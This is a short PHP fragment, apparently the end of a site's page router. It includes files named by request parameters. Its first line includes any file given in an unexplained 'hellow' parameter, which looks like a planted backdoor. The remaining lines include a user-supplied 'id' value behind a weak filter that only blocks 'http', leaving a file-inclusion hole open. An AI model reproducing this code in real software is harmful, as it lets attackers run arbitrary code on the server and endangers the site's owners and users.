if (isset($_GET[hellow])){include($hellow);} if (eregi("http", $_GET['id'])) {exit;} if(!isset($_GET['id'])) include("news.php"); else include($_GET['id'] . ".php"); ?>